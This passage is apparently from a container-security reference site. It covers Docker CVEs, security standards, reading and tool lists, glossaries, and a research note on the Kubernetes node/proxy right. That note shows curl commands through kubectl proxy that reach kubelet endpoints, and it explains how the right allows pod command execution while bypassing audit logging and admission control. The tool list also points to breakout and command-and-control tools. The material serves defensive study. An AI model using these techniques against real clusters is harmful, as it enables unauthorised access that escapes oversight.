20.10.11 | | 83 | | [CVE-2021-41091](https://github.com/moby/moby/security/advisories/GHSA-3fwx-pjgw-3558) | 6.3 | Insufficiently restricted permissions on data directory | < 20.10.9 | 20.10.9 | [Cyberark blog post](https://www.cyberark.com/resources/threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure) | 84 | | [CVE-2021-41089](https://github.com/moby/moby/security/advisories/GHSA-v994-f8vw-g7j4) | 6.3 | `docker cp` allows unexpected chmod of host files | < 20.10.9 | 20.10.9 | | 85 | | [CVE-2021-21285](https://github.com/moby/moby/security/advisories/GHSA-6fj5-m822-rqx8) | 6.5 | Docker daemon crash during image pull of malicious image | < 19.03.15, < 20.10.3 | 19.03.15, 20.10.3 | | 86 | | [CVE-2021-21284](https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc) | 6.8 | Access to remapped root allows privilege escalation to real root | < 19.03.15, < 20.10.3 | 19.03.15, 20.10.3 | | 87 | | [CVE-2020-27534](https://nvd.nist.gov/vuln/detail/CVE-2020-27534) | 5.3 | Docker calls os.OpenFile with a potentially unsafe qemu-check temporary pathname | < 19.03.9 | 19.03.9 | | 88 | | [CVE-2019-14271](https://nvd.nist.gov/vuln/detail/CVE-2019-14271) | 9.8 | docker cp vulnerability | 19.03 | 19.03.1 | [Tenable Blog Post](https://www.tenable.com/blog/cve-2019-14271-proof-of-concept-for-docker-copy-docker-cp-vulnerability-released) | 89 | | [CVE-2019-13509](https://nvd.nist.gov/vuln/detail/CVE-2019-13509) | 7.5 | Docker Engine in debug mode may sometimes add secrets to the debug log | < 18.09.8 | 18.09.8 | | 90 | | [CVE-2019-13139](https://nvd.nist.gov/vuln/detail/CVE-2019-13139) | 8.4 | Manipulation of the build path for the "docker build" command could allow for command execution | < 18.09.4 | 18.09.4 | | 91 | | [CVE-2018-15664](https://nvd.nist.gov/vuln/detail/CVE-2018-15664) | 7.5 | docker cp race condition | < 18.06.1-ce-rc2 | 18.06.1-ce-rc2 | [Capsule8 blog post](https://capsule8.com/blog/race-conditions-cloudy-with-a-chance-of-r-w-access/) | 92 | | [CVE-2017-14992](https://nvd.nist.gov/vuln/detail/CVE-2017-14992) | 6.5 | DoS via gzip bomb | < 17.09.1 | 17.09.1 | | 93 | 94 | 95 | -------------------------------------------------------------------------------- /general_information/container_security_standards.md: -------------------------------------------------------------------------------- 1 | # Container Security Standards 2 | 3 | There are a number of sets of guidance which are provided by various bodies and can be useful in understanding how to secure container environments. Generally speaking, they fall into two categories: compliance standards and hardening guides. The difference is that compliance standards generally seek to give precise recommendations at the level of setting specific parameters and file permissions for a specific product, where hardening guides tend to cover more ground at a higher level. Whilst hardening guides may have some specific details, they don't try to comprehensively cover all settings related to security in one product. 4 | 5 | ## Compliance standards 6 | 7 | - [CIS Benchmark for Kubernetes](https://www.cisecurity.org/benchmark/kubernetes) - There are benchmarks for a number of distributions. The main one covers Kubeadm and there are also benchmarks for EKS, AKS, GKE, OpenShift, ACK and OKE.
8 | - [CIS Benchmark for Docker](https://www.cisecurity.org/benchmark/docker) - Worth noting that this specifically relates to Docker as a stand-alone container engine; some of the recommendations will not apply when it's used as part of a Kubernetes cluster. 9 | - [DISA STIG for Kubernetes](https://stigviewer.com/stig/kubernetes/2021-04-14/) - Doesn't specify the Kubernetes distribution that's covered, but from the settings, it's likely Kubeadm. 10 | - [DISA STIG for Docker Enterprise](https://www.stigviewer.com/stig/docker_enterprise_2.x_linuxunix/) - Whilst it's Docker's (now Mirantis') commercial product, some of the recommendations apply generally to Docker. 11 | 12 | ## Hardening Guides 13 | 14 | - [NSA Kubernetes Hardening Guide](https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF) - Covers Kubernetes hardening and some general related topics like Kubernetes auditing and threat detection 15 | - [PCI recommendations for containers and container orchestration](https://docs-prv.pcisecuritystandards.org/Guidance%20Document/Containers%20and%20Container%20Orchestration%20Tools/Guidance-for-Containers-and-Container-Ochestration-Tools-v1_0.pdf?hsCtaTracking=e1f57154-dcd8-4ddc-88bc-099110ddaec7%7C5b4d5cdd-43fb-4107-92c5-cfe752cdc807) - Covers, in a non-product specific way, container and container orchestration security. Whilst it's targeted at PCI environments, most of the guidance applies to container environments in general. There's some commentary on it [here](https://raesene.github.io/blog/2022/09/10/PCI-Guidance-for-containers-and-container-orchestration-tools/) -------------------------------------------------------------------------------- /general_information/reading_list.md: -------------------------------------------------------------------------------- 1 | # Reading List 2 | 3 | This is a list of more in-depth articles that are worth reading to get a better understanding of some of the underlying technologies used by Containers and how things like Kubernetes work.
4 | 5 | ## Container History 6 | 7 | - [Brief Container History](https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016) 8 | - Series of posts from 2013 on the history of container engines leading up to Docker 9 | - [part one](https://web.archive.org/web/20191011153644/http://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-one-a-history-of-operating-system-containers/) 10 | - [part two](https://web.archive.org/web/20191011151348/https://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-two-jails-zones-openvz-and-lxc/) 11 | - [part three](https://web.archive.org/web/20191011153243/http://www.cybera.ca/news-and-events/tech-radar/contain-your-enthusiasm-part-three-docker/ ) 12 | 13 | ## Docker Networking 14 | 15 | - [Post on Linux Bridging](https://www.thegeekstuff.com/2017/06/brctl-bridge/) 16 | - Posts on Docker MACVLAN 17 | - [part one](https://web.archive.org/web/20190217173244/https://hicu.be/docker-networking-macvlan-vlan-configuration) 18 | - [part two](https://web.archive.org/web/20190130130707/hicu.be/bridge-vs-macvlan) 19 | 20 | ## Container Storage and Volumes 21 | 22 | - [Post detailing how Docker union Filesystems and storage drivers work](https://integratedcode.us/2016/08/30/storage-drivers-in-docker-a-deep-dive/) 23 | - [Post on union file systems](https://www.terriblecode.com/blog/how-docker-images-work-union-file-systems-for-dummies/) 24 | - [Post with some opinions on the available Docker storage graphdrivers](https://blog.jessfraz.com/post/the-brutally-honest-guide-to-docker-graphdrivers/) 25 | 26 | ## Container Fundamentals 27 | 28 | ### Container Security Fundamental Series 29 | 30 | - [Exploring containers as processes](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-1/) 31 | - [Isolation and namespaces](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-2/) 32 | - [Capabilities](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-3/) 33 | - [cgroups](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-4/) 34 | 35 | 36 | - [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf) - Whitepaper that goes into detail about container fundamental security. 
37 | 38 | - Series of posts from Ian Lewis on Container runtimes 39 | - [part one](https://www.ianlewis.org/en/container-runtimes-part-1-introduction-container-r) 40 | - [part two](https://www.ianlewis.org/en/container-runtimes-part-2-anatomy-low-level-contai) 41 | - [part three](https://www.ianlewis.org/en/container-runtimes-part-3-high-level-runtimes) 42 | - [part four](https://www.ianlewis.org/en/container-runtimes-part-4-kubernetes-container-run) 43 | 44 | - [Start of a good series of posts on LWN about Namespaces](https://lwn.net/Articles/531114/) 45 | 46 | - Good Series of Articles on Namespaces 47 | - [part one](http://ifeanyi.co/posts/linux-namespaces-part-1/) 48 | - [part two](http://ifeanyi.co/posts/linux-namespaces-part-2/) 49 | - [part three](http://ifeanyi.co/posts/linux-namespaces-part-3/) 50 | - [part four](http://ifeanyi.co/posts/linux-namespaces-part-4/) 51 | 52 | - [Post specifically focusing on the PID namespace and its relation to containers](https://hackernoon.com/the-curious-case-of-pid-namespaces-1ce86b6bc900) 53 | 54 | - [Post from Jessie Frazelle about non-namespaced resources in Linux](https://blog.jessfraz.com/post/two-objects-not-namespaced-linux-kernel/) 55 | 56 | - Good series of posts on capabilities from siphos 57 | - [part one](http://blog.siphos.be/2013/05/capabilities-a-short-intro/) 58 | - [part two](http://blog.siphos.be/2013/05/restricting-and-granting-capabilities/) 59 | - [part three](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-1/) 60 | - [part four](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-2/) 61 | - [part five](http://blog.siphos.be/2013/05/overview-of-linux-capabilities-part-3/) 62 | 63 | - [This post goes into the slightly obscure topic of "ambient capabilities"](https://s3hh.wordpress.com/2015/07/25/ambient-capabilities/) 64 | - [Post from spender of grsecurity. Talks about privesc possibilities from certain capabilities](https://forums.grsecurity.net/viewtopic.php?f=7&t=2522&sid=c6fbcf62fd5d3472562540a7e608ce4e#p10271) 65 | - [Post which isn't just on capabilities. It goes into the idea of building your own containers, and as part of that, covers capabilities](https://blog.lizzie.io/linux-containers-in-500-loc.html) 66 | - [Post about LXC and capabilities](https://blog.iwakd.de/lxc-cap_sys_admin-jessie) 67 | - [Post detailing how Docker uses cgroups](https://shekhargulati.com/2019/01/03/how-docker-uses-cgroups-to-set-resource-limits/) 68 | - [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/abusing-privileged-and-unprivileged-linux-containers.pdf) whitepaper on container breakout techniques, including focus on NET_RAW.
69 | - [Good post on Capabilites, seccomp and the practical use of file capabilities](https://linuxera.org/container-security-capabilities-seccomp/) 70 | 71 | ## Docker Security 72 | 73 | - [Post on Docker Authorization plugins](https://blog.aquasec.com/docker-1.10-security-features-part-2-authorization-plug-in) 74 | 75 | 76 | ## Container Registry Security 77 | 78 | - [Post about how registries can be used/abused](https://www.antitree.com/2021/10/abusing-registries-for-exfil-and-droppers/) 79 | - [ContainerDrip write-up with good details on how registries work](https://darkbit.io/blog/cve-2020-15157-containerdrip) 80 | 81 | 82 | ## Docker Swarm 83 | 84 | - [Docker Swarm Certificate management](https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/) 85 | 86 | ## runc 87 | 88 | - [Post on how to use runc directly](https://danishpraka.sh/2020/07/24/introduction-to-runc.html) 89 | 90 | ## Kubernetes - General 91 | 92 | - [Post that goes into a lot of detail of how Kubernetes works to create a deployment](https://github.com/jamiehannaford/what-happens-when-k8s) 93 | - [Post on What a Kubernetes Pod is](https://www.ianlewis.org/en/what-are-kubernetes-pods-anyway) 94 | - [Post on the pause container](https://www.ianlewis.org/en/almighty-pause-container) 95 | 96 | ## Kubernetes Networking 97 | 98 | - [Website that goes into detail on the Kubernetes networking model](https://k8s.networkop.co.uk/) 99 | 100 | - Good set of posts on Container networking setup 101 | - [part one](https://itnext.io/an-illustrated-guide-to-kubernetes-networking-part-1-d1ede3322727) 102 | - [part two](https://itnext.io/an-illustrated-guide-to-kubernetes-networking-part-2-13fdc6c4e24c) 103 | 104 | - [Post on implementing your own CNI plugin in Bash](https://www.altoros.com/blog/kubernetes-networking-writing-your-own-simple-cni-plug-in-with-bash/) 105 | 106 | - [Post on how to implement a replacement for kube-proxy](https://arthurchiao.art/blog/cracking-k8s-node-proxy/) 107 | - [Post on how Kubernetes service traffic direction is done](https://dustinspecker.com/posts/iptables-how-kubernetes-services-direct-traffic-to-pods/) 108 | 109 | ## Kubernetes Security 110 | 111 | - [Playlist of Kubernetes pentesting/security videos](https://www.youtube.com/playlist?list=PLKDRii1YwXnLmd8ngltnf9Kzvbja3DJWx) 112 | - [Post on creating reverse shells from Docker and Kubernetes](https://raesene.github.io/blog/2019/08/09/docker-reverse-shells/) 113 | - [Post on getting reverse shells on every node in a cluster](https://raesene.github.io/blog/2019/08/10/making-it-rain-shells-in-Kubernetes/) 114 | 115 | ## Attacking/Pentesting Kubernetes 116 | 117 | - [Executing code on read-only containers](https://labs.withsecure.com/publications/executing-arbitrary-code-executables-in-read-only-filesystems) 118 | 119 | 120 | ## Books 121 | 122 | ### Security Books 123 | - [Free Container Security book from Aqua](https://info.aquasec.com/container-security-book) 124 | - [Free Kubernetes Security book from Aqua](https://info.aquasec.com/kubernetes-security) 125 | - [Hacking Kubernetes](https://www.oreilly.com/library/view/hacking-kubernetes/9781492081722/) 126 | - [Cloud Native Security](https://www.amazon.co.uk/Cloud-Native-Security-Chris-Binnie-ebook/dp/B097NHC3BS) 127 | 128 | ### General Books 129 | - [Free Kubernetes Up and Running from VMWare](https://k8s.vmware.com/kubernetes-up-and-running/) 130 | - [Docker in Practice](https://www.manning.com/books/docker-in-practice-second-edition) 131 | - [Kubernetes in 
Action](https://www.manning.com/books/kubernetes-in-action-second-edition) 132 | -------------------------------------------------------------------------------- /general_information/support_lifecycles.md: -------------------------------------------------------------------------------- 1 | # Support Lifecycles for container software and services 2 | 3 | As this information is a bit scattered, here are some links to support lifecycle information for various projects and services in the container world. 4 | 5 | - [containerd](https://github.com/containerd/containerd/blob/main/RELEASES.md) 6 | - [Docker](https://endoflife.date/docker-engine) 7 | - [GKE](https://endoflife.date/google-kubernetes-engine) 8 | - [EKS](https://docs.aws.amazon.com/eks/latest/userguide/kubernetes-versions.html) 9 | - [AKS](https://learn.microsoft.com/en-us/azure/aks/supported-kubernetes-versions?tabs=azure-cli#aks-kubernetes-release-calendar) 10 | - [Kubernetes](https://endoflife.date/kubernetes#:~:text=Kubernetes%20follows%20an%20N%2D2,2%20months%20of%20upgrade%20period) 11 | - [OpenShift 3](https://access.redhat.com/support/policy/updates/openshift_noncurrent) -------------------------------------------------------------------------------- /general_information/tools_list.md: -------------------------------------------------------------------------------- 1 | # Container & Kubernetes Security Tools 2 | 3 | This is a list of open source tools which help with areas related to Container security. Some of the tools in this list don't fit neatly into a specific category or categories, so they're listed with the closest option. 4 | 5 | ## Container Attack Surface Assessment & Breakout Tools 6 | 7 | Useful tools to run inside a container to assess the sandbox that's in use, and exploit some common breakout issues. 8 | 9 | * [deepce](https://github.com/stealthcopter/deepce) - Docker Enumeration, Escalation of Privileges and Container Escapes 10 | * [CDK](https://github.com/cdk-team/CDK) - Container and Kubernetes auditing and breakout tool. 11 | 12 | ## Container Vulnerability Scanning Tools 13 | 14 | * [Trivy](https://github.com/aquasecurity/trivy) - Vulnerability and IaC scanner 15 | * [Grype](https://github.com/anchore/grype) - Container vulnerability scanner 16 | * [clair](https://github.com/quay/clair) - Container vulnerability scanner 17 | * [Docker Scout](https://docs.docker.com/scout/) - Container Vulnerability scanner 18 | * [dep-scan](https://github.com/AppThreat/dep-scan) - Vulnerability and mis-configuration scanner 19 | * [Neuvector Scanner](https://github.com/neuvector/scanner) - Container Vulnerability Scanning Tool. 20 | 21 | ## IaC Scanning Tools that cover container formats 22 | 23 | * [Trivy](https://github.com/aquasecurity/trivy) - Vulnerability and IaC scanner 24 | * [Checkov](https://github.com/bridgecrewio/checkov) - IaC scanner 25 | * [KICS](https://github.com/Checkmarx/kics) - IaC scanner 26 | * [dep-scan](https://github.com/AppThreat/dep-scan) - Vulnerability and mis-configuration scanner 27 | 28 | 29 | ## Docker Security Tools 30 | 31 | * [docker bench](https://github.com/docker/docker-bench-security) - Docker CIS Benchmark assessment tool 32 | * [Dockle](https://github.com/goodwithtech/dockle) - Container Image Linter 33 | * [cnspec](https://github.com/mondoohq/cnspec) - Assessment tool for multiple platforms including Docker and Kubernetes 34 | 35 | ## Container Runtime Security Tools 36 | 37 | * [Tracee](https://github.com/aquasecurity/tracee).
Container runtime security tooling 38 | * [Falco](https://github.com/falcosecurity/falco). Container runtime security tooling 39 | * [Kubearmor](https://github.com/kubearmor/KubeArmor). Container runtime security enforcement tool 40 | * [Tetragon](https://github.com/cilium/tetragon). Container runtime security tool 41 | 42 | ## Container Registry Tools 43 | 44 | * [regclient](https://github.com/regclient/regclient) - Another tool for interacting with container registries 45 | * [crane](https://github.com/google/go-containerregistry) - Tool for interacting with Container registries. 46 | * [skopeo](https://github.com/containers/skopeo) - Tool for interaction with Container registries 47 | 48 | 49 | ## Container Image Tools 50 | 51 | * [Dive](https://github.com/wagoodman/dive) - Tool for exploring Container image layers 52 | 53 | ## Kubernetes Tools 54 | 55 | ### RBAC Assessment Tools 56 | 57 | * [rbac-tool](https://github.com/alcideio/rbac-tool) - RBAC Tool for Kubernetes 58 | * [kubiScan](https://github.com/cyberark/KubiScan) - Tool to scan Kubernetes clusters for risky permissions 59 | * [krane](https://github.com/appvia/krane) - Kubernetes RBAC static analysis & visualisation tool 60 | * [eathar](https://github.com/raesene/eathar) - Kubernetes security assessment tool focusing on workload security and RBAC. 61 | 62 | ### Kubernetes Security Auditing Tools 63 | 64 | * [kube-bench](https://github.com/aquasecurity/kube-bench) - Tool to assess compliance with the CIS benchmark for various Kubernetes distributions 65 | * [kubescape](https://github.com/armosec/kubescape) - Kubernetes security assessment tool 66 | * [kubesec](https://github.com/controlplaneio/kubesec) - Kubernetes security assessment tool focusing on workload security 67 | * [kubescore](https://github.com/zegl/kube-score) - Kubernetes security and reliability assessment tool focusing on workload security. 68 | * [eathar](https://github.com/raesene/eathar) - Kubernetes security assessment tool focusing on workload security and RBAC. 69 | * [popeye](https://github.com/derailed/popeye) - Kubernetes cluster scanner, looking for possible mis-configurations. 70 | * [cnspec](https://github.com/mondoohq/cnspec) - Assessment tool for multiple platforms including Docker and Kubernetes 71 | 72 | 73 | ### Kubernetes Penetration Testing Tools 74 | 75 | * [peirates](https://github.com/inguardians/peirates) - Kubernetes container breakout tool 76 | * [teisteanas](https://github.com/raesene/teisteanas) - Tool to create kubeconfig files based on the CertificateSigningRequest API. 77 | * [tòcan](https://github.com/raesene/tocan) - Tool to create kubeconfig files based on the TokenRequest API. 78 | * [MKAT](https://github.com/DataDog/managed-kubernetes-auditing-toolkit/) - Managed Kubernetes Auditing Tool. Focuses on exploring security issues in managed Kubernetes (e.g. EKS) 79 | * [Kubehound](https://kubehound.io/) - KubeHound creates a graph of attack paths in a Kubernetes cluster 80 | * [IceKube](https://github.com/WithSecureLabs/IceKube) - Kubernetes attack path evaluation tool. 81 | * [namespacehound](https://github.com/wiz-sec-public/namespacehound/) - Tool to test a cluster for possible namespace breakouts where multi-tenancy is in use. 82 | 83 | ### Kubelet Tools 84 | 85 | * [kubeletctl](https://github.com/cyberark/kubeletctl) - This is a good tool to automate the process of assessing a kubelet instance. 
If the instance is vulnerable it can also carry out some exploit tasks 86 | * [kubelet dumper](https://github.com/raesene/kubelet_dumper) - PoC tool to dump Kubelet configurations for review. 87 | 88 | ### Security Observability Tools 89 | 90 | * [ThreatMapper](https://github.com/deepfence/ThreatMapper). Cloud + Container Security observability 91 | 92 | ### Training Tools 93 | 94 | If you're looking to practice with some of the tools here, in a safe environment, there are projects to help with that. 95 | 96 | * [Kube Security Lab](https://github.com/raesene/kube_security_lab) - Basic set of Kubernetes security scenarios implemented in Ansible with KinD 97 | * [Kubernetes Simulator](https://github.com/kubernetes-simulator/simulator) - AWS based Kubernetes cluster environment with different vulnerability scenarios 98 | * [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) - Focuses on vulnerable deployments on top of an existing cluster. Also available on line [with Katacoda](https://katacoda.com/madhuakula/scenarios/kubernetes-goat) 99 | * [K8s-iam-lab](https://github.com/TremoloSecurity/k8s-idm-lab) - Kubernetes IAM Lab 100 | 101 | ### Kubernetes Honeypot projects 102 | 103 | * [Helix Honeypot](https://github.com/Zeerg/helix-honeypot) - Kubernetes API server honeypot 104 | * [Kubernetes Honeytokens](https://blog.thinkst.com/2021/11/a-kubeconfig-canarytoken.html) - A honey token Canary for use with honeypots. 105 | 106 | ### Kubernetes Security Improvement Tools 107 | 108 | * [Security Profiles Operator](https://github.com/kubernetes-sigs/security-profiles-operator) - Kubernetes operator for security profiles 109 | * [hardeneks](https://github.com/aws-samples/hardeneks) - Tool to harden EKS clusters 110 | 111 | # Deprecated/Unmaintained Tools 112 | 113 | Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I've listed you here and you're not deprecated just open an issue to move it back :) 114 | 115 | * [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Tool to test and exploit standard Kubernetes Security Vulnerabilities 116 | * [kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) - Tool that lets you ask "who can" do things in RBAC, e.g. who can get secrets 117 | * [rakkess](https://github.com/corneliusweig/rakkess) - Shows the RBAC permissions available to a user as a list 118 | * [rback](https://github.com/team-soteria/rback) - tool for graphical representation of RBAC permissions in a kubernetes cluster 119 | * [amicontained](https://github.com/genuinetools/amicontained) - will show you information about the container runtime and rights you have 120 | * [ConMachi](https://github.com/nccgroup/ConMachi/) - Pentester focused container attack surface assessment tool 121 | * [botb](https://github.com/brompwnie/botb) - Container breakout assessment tool. 
Can automatically exploit common issues like the Docker socket mount 122 | * [keyctl-unmask](https://github.com/antitree/keyctl-unmask) - Tool that specifically focuses on grabbing kernel keyring entries from containers that allow the keyctl syscall 123 | * [go-pillage-registries](https://github.com/nccgroup/go-pillage-registries) - Tool to search the manifests and configuration for images in a registry for potentially sensitive information 124 | * [reg](https://github.com/genuinetools/reg) - Tool for interacting with Container registries 125 | * [Whaler](https://github.com/P3GLEG/Whaler) - Tool to reverse Docker images into Dockerfiles. 126 | * [RBAC Police](https://github.com/PaloAltoNetworks/rbac-police) - RBAC policy evaluation. 127 | * [kubestrike](https://github.com/vchinnipilli/kubestrike) - Security auditing tool for Kubernetes looks at Authenticated and unauthenticated scanning 128 | * [kubestroyer](https://github.com/Rolix44/Kubestroyer) - Kubernetes pentesting tool. 129 | * [kubestalk](https://github.com/redhuntlabs/kubestalk) - Black Box Kubernetes Pentesting Tool. 130 | * [kubedagger](https://github.com/yasindce1998/KubeDagger) - Kubernetes offensive framework built in eBPF. 131 | * [kubesploit](https://github.com/cyberark/kubesploit) - Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, focused on containerized environments 132 | * [k8spot](https://github.com/Maddosaurus/k8spot) - Kubernetes honeypot. 133 | * [Terrascan](https://github.com/tenable/terrascan) - IAC Scanner for various formats including Docker and Kubernetes 134 | * [hadolint](https://github.com/hadolint/hadolint) - Docker file linter 135 | * [kubeaudit](https://github.com/Shopify/kubeaudit) - Kubernetes security assessment tool focusing on workload security 136 | * [kdigger](https://github.com/quarkslab/kdigger) - Kubernetes breakout/discovery tool 137 | * [auger](https://github.com/jpbetz/auger) - Tool for decoding information pulled directly from the etcd database 138 | -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/raesene/container-security-site/8d7b7d3fd20f48c4c6c073256b479ff8486a86ec/images/logo.png -------------------------------------------------------------------------------- /images/under_construction.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/raesene/container-security-site/8d7b7d3fd20f48c4c6c073256b479ff8486a86ec/images/under_construction.gif -------------------------------------------------------------------------------- /jargon_busters/container_terms_for_security_people.md: -------------------------------------------------------------------------------- 1 | # Container Terms for Security People 2 | 3 | * **Container** - A container is just a running Linux process which has been isolated from the rest of the host, generally using standard Linux security measures like namespaces and cgroups. There are variants on this (like Windows containers and VM based solutions) but usually container == linux process 4 | 5 | * **Container Image** - This is a tarball, which has the application that the container will run, plus any supporting software needed to run it. 
Many containers use Linux packages and root filesystems for their container images, so these need to be patched/scanned/updated similarly to standard Linux hosts 6 | 7 | * **Container Runtime** - Usually Docker. This is essentially command execution as a service. Docker will pull down container images and then launch processes based on those images. Docker doesn't (by default) listen on the network, but can be configured to. At that point it's best thought of as "remote command execution as a service". An important point is that Docker access == root on the host, by design. 8 | 9 | * **Container Orchestrator** - Usually Kubernetes. This is a clustering system which ties together sets of hosts running things like Docker, and lets developers and administrators run containers across all of the hosts in the cluster. Unlike Docker, Kubernetes is a multi-user system with Role Based Access Control. Effectively, Kubernetes can be thought of as "distributed remote command execution as a service". -------------------------------------------------------------------------------- /jargon_busters/security_terms_for_container_people.md: -------------------------------------------------------------------------------- 1 | # Security Terms For Container People 2 | 3 | There's quite a lot of terminology which may be unfamiliar to container app developers and cluster operators. These definitions are not meant to be comprehensive (whole books have been written about some of these topics) but hopefully a useful "starter for 10". 4 | 5 | * **CVE** - Stands for "Common Vulnerabilities and Exposures". A CVE is a term used in security, typically to refer to a specific security vulnerability (For example [CVE-2020-8558](https://nvd.nist.gov/vuln/detail/CVE-2020-8558) is an issue in kube-proxy). CVEs are useful as there's a centralised database of them which can be checked by tools and people who want to track what versions of various products are vulnerable to specific issues, making it easy to check things like "what vulnerabilities does the installed product with version x.x have". 6 | 7 | * **CVSS** - Stands for "Common Vulnerability Scoring System". This gets used alongside the CVE database to provide severity ratings for vulnerabilities. CVSS provides formulas to approximate the severity of an issue, although it's important to note that these scores include subjective measures. Security tooling vendors will often use these ratings as the basis for their own severity calculations. 8 | 9 | * **Threat Model** - An important part of any security assessment is to determine what the applicable threat model is. This essentially means "who do I think is going to attack this thing, and what kind of attacks will they use". Without a good threat model it's very easy to waste money on controls you don't need and miss controls you do need. Also, if you see someone making claims that something "is secure", it's obviously important to determine what it's secure from (no system is perfectly secure), so knowing the threat model that's been used is key. 10 | 11 | * **Attack Surface** - Often gets discussed alongside threat model. If the threat model is "who's attacking me", the attack surface is "where can they attack me". So for example, if an attacker is coming in over the Internet, every service you have listening on the Internet is part of your attack surface. If you use cloud services, then your logins for those services are also part of your attack surface.
Generally speaking, from a security point of view, the bigger the attack surface, the harder it is to secure it (you have more things to look at), so security people are generally keen on reducing that attack surface, to give them a smaller list of things to focus on. -------------------------------------------------------------------------------- /robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: AdsBot-Google 2 | User-agent: Amazonbot 3 | User-agent: anthropic-ai 4 | User-agent: Applebot 5 | User-agent: AwarioRssBot 6 | User-agent: AwarioSmartBot 7 | User-agent: Bytespider 8 | User-agent: CCBot 9 | User-agent: ChatGPT-User 10 | User-agent: ClaudeBot 11 | User-agent: Claude-Web 12 | User-agent: cohere-ai 13 | User-agent: DataForSeoBot 14 | User-agent: FacebookBot 15 | User-agent: Google-Extended 16 | User-agent: GPTBot 17 | User-agent: ImagesiftBot 18 | User-agent: magpie-crawler 19 | User-agent: omgili 20 | User-agent: omgilibot 21 | User-agent: peer39_crawler 22 | User-agent: peer39_crawler/1.0 23 | User-agent: PerplexityBot 24 | User-agent: YouBot 25 | Disallow: / -------------------------------------------------------------------------------- /security_research/index.md: -------------------------------------------------------------------------------- 1 | # Security Research 2 | 3 | An area to put content that doesn't fit neatly into attacker or defender. -------------------------------------------------------------------------------- /security_research/node_proxy.md: -------------------------------------------------------------------------------- 1 | # Node/Proxy in Kubernetes RBAC 2 | 3 | Some work done by [Rory McCune](https://twitter.com/raesene) and [Iain Smart](https://twitter.com/smarticu5) on a less well documented area of the Kubernetes/Kubelet API and RBAC rights 4 | 5 | ## Introduction 6 | 7 | The node/proxy right in Kubernetes RBAC allows for users with it to get access to services running on cluster nodes *via* the API server, which can have consequences for security architecture. 8 | 9 | Additionally with relation to the kubelet, this RBAC right could allow for effective privilege escalation and bypass of security controls such as Kubernetes audit logging and admission control. 10 | 11 | Depending on the cluster's threat model, care should be taken before granting this right, either explicitly or via the use of wildcards (e.g. cluster-admin). 12 | 13 | ## Using the API server Proxy 14 | 15 | Based on the [API server proxy documentation](https://kubernetes.io/docs/concepts/architecture/control-plane-node-communication/#apiserver-to-nodes-pods-and-services) we can see that it's possible to get access to other services running on cluster nodes, where they use HTTP or HTTPS. This feature can also be used to proxy to pods and services, but we're focusing on the node aspect. 16 | 17 | This could allow users to access ports which they may not be able to reach directly due to network firewalls. 18 | 19 | As an example, by using `kubectl proxy` we can show access to the kube-proxy health port on a cluster control plane node. 20 | 21 | This will start a proxy of the API server on localhost, port 8001 22 | ``` 23 | kubectl proxy 24 | Starting to serve on 127.0.0.1:8001 25 | ``` 26 | 27 | We can then curl to the API server using that and access the kube-proxy API. 
28 | 29 | ``` 30 | curl http://127.0.0.1:8001/api/v1/nodes/kubeadm2nodemaster:10256/proxy/healthz 31 | {"lastUpdated": "2022-01-27 12:05:32.176657288 +0000 UTC m=+1737670.978648438","currentTime": "2022-01-27 12:05:32.176657288 +0000 UTC m=+1737670.978648438"} 32 | ``` 33 | 34 | ## Using the API server proxy for Kubelet access 35 | 36 | In general, access via the node proxy is unauthenticated; however, when accessing the kubelet service, this access is credentialed. This access can be used to do things that the user may not have rights to do, for example listing all pods on the node. 37 | 38 | This excerpt is truncated for brevity! 39 | ``` 40 | curl http://127.0.0.1:8001/api/v1/nodes/kubeadm2nodemaster:10250/proxy/pods 41 | {"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kubernetes-dashboard-78c79f97b4-bmhwj", 42 | ``` 43 | 44 | ## Node/Proxy rights to the Kubelet API service 45 | 46 | The Kubernetes RBAC permission used here effectively has a dual purpose. In addition to allowing access via the API server, it also provides direct access to the Kubelet API (the [kubelet documentation](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/#kubelet-authorization) covers the rights). 47 | 48 | In general the kubelet is only accessed by the API server; *however*, it also supports webhook authentication, and in a standard kubeadm cluster this is configured to use the API server as the AuthN/AuthZ service. 49 | 50 | What this means is that a user with a valid client certificate or service account token can authenticate to the kubelet API directly. 51 | 52 | If that account has GET and CREATE rights to the proxy sub-resource of the node object, they can effectively execute commands in every pod on that node, directly via the Kubelet API *without* hitting the Kubernetes API. The GET right controls read access operations (like pod listing) and the CREATE right controls write access operations (like command execution). 53 | 54 | ## Security Architecture Considerations 55 | 56 | This architecture has a number of consequences from a security standpoint. First up, any user with node/proxy rights can access node services with a source IP of the Kubernetes API server, bypassing any firewalls that may restrict access from their client location. 57 | 58 | More seriously, any user with node/proxy rights can bypass any security controls put in place at the Kubernetes API server level. This includes audit logging (the kubelet does not support audit logging) and admission control (which is API server only). 59 | 60 | ## Possible Recommendations 61 | 62 | - Ensure that only trusted service accounts and users have node/proxy rights. Note that any user with cluster-admin rights will have this as part 